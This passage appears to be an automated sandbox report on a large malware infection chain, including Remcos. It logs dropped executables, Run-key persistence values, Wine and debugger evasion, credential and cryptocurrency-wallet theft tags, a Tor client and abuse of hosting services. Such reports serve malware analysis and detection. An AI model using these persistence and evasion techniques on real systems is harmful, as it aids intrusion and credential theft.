N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A freegeoip.app N/A N/A
N/A freegeoip.app N/A N/A
N/A ip-api.com N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\ruts\rfusclient.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\SysWOW64\ruts\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\rutserv.exe C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\boleto C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new C:\Windows\system32\lsass.exe N/A
File opened for modification C:\Windows\System32\Tasks\rutssvc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus C:\Windows\System32\dllhost.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp C:\Windows\system32\lsass.exe N/A
File created C:\Windows\SysWOW64\ruts\libeay32.dll C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
File opened for modification C:\Windows\System32\Tasks\xda C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\ruts\11.reg C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File created C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
File opened for modification C:\Program Files\Windows Media Player\graph\graph.exe C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Remcos\remcos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

